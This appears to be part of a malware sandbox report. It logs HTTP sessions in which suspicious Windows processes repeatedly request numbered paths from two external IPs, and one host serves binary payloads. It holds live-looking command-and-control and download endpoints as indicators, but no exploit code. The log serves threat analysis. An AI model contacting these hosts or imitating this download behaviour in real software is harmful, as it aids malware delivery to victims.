                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                                                               May 8, 2024 15:24:32.685553074 CEST | 167 | OUT | GET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                               May 8, 2024 15:24:33.043720961 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:32 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               33 | 192.168.2.8 | 49761 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:31.229809046 CEST | 166 | OUT | GET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                               May 8, 2024 15:24:31.584639072 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               34 | 192.168.2.8 | 49762 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:33.960163116 CEST | 166 | OUT | GET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                               May 8, 2024 15:24:34.309627056 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:34 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               35 | 192.168.2.8 | 49764 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:36.700463057 CEST | 166 | OUT | GET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                               May 8, 2024 15:24:37.058093071 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:36 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               36 | 192.168.2.8 | 49765 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:39.447741032 CEST | 166 | OUT | GET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                               May 8, 2024 15:24:39.802493095 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:39 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               37 | 192.168.2.8 | 49766 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               May 8, 2024 15:24:42.656124115 CEST | 166 | OUT | GET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                               May 8, 2024 15:24:43.011125088 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:42 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID: 38 | Source IP: 192.168.2.8 | Source Port: 49768 | Destination IP: 91.202.233.141 | Destination Port: 80 | PID: 5588 | Process: C:\Windows\sysbrapsvc.exe
                                                                              Timestamp: May 8, 2024 15:24:45.383446932 CEST | Bytes transferred: 166 | Direction: OUT | Data: GET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              Timestamp: May 8, 2024 15:24:45.734081030 CEST | Bytes transferred: 728 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:45 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID: 39 | Source IP: 192.168.2.8 | Source Port: 49772 | Destination IP: 185.215.113.66 | Destination Port: 80 | PID: 2060 | Process: C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp: May 8, 2024 15:24:55.958838940 CEST | Bytes transferred: 167 | Direction: OUT | Data: GET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              Timestamp: May 8, 2024 15:24:56.300591946 CEST | Bytes transferred: 1289 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:56 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes


                                                                              Session ID: 40 | Source IP: 192.168.2.8 | Source Port: 49774 | Destination IP: 185.215.113.66 | Destination Port: 80 | PID: 2060 | Process: C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp: May 8, 2024 15:24:59.695621014 CEST | Bytes transferred: 167 | Direction: OUT | Data: GET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              Timestamp: May 8, 2024 15:25:00.037353992 CEST | Bytes transferred: 1289 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:59 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes


                                                                              Session ID: 41 | Source IP: 192.168.2.8 | Source Port: 49776 | Destination IP: 185.215.113.66 | Destination Port: 80 | PID: 2060 | Process: C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp: May 8, 2024 15:25:02.402909040 CEST | Bytes transferred: 167 | Direction: OUT | Data: GET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              Timestamp: May 8, 2024 15:25:02.743000984 CEST | Bytes transferred: 1289 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:02 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:44 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7354-2408"
                                                                              Accept-Ranges: bytes


                                                                              Session ID: 42 | Source IP: 192.168.2.8 | Source Port: 49777 | Destination IP: 91.202.233.141 | Destination Port: 80 | PID: 2060 | Process: C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp: May 8, 2024 15:25:06.240839005 CEST | Bytes transferred: 167 | Direction: OUT | Data: GET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              Timestamp: May 8, 2024 15:25:06.586477041 CEST | Bytes transferred: 728 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:06 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              Timestamp: May 8, 2024 15:25:08.607018948 CEST | Bytes transferred: 167 | Direction: OUT | Data: GET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              Timestamp: May 8, 2024 15:25:08.952675104 CEST | Bytes transferred: 728 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:08 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:25:10.982568979 CEST | 167 | OUT | GET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:11.329552889 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:11 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              43 | 192.168.2.8 | 49784 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:25.901874065 CEST | 166 | OUT | GET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:26.244594097 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:26 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 101120
                                                                              Last-Modified: Mon, 06 May 2024 15:20:46 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638f54e-18b00"
                                                                              Accept-Ranges: bytes
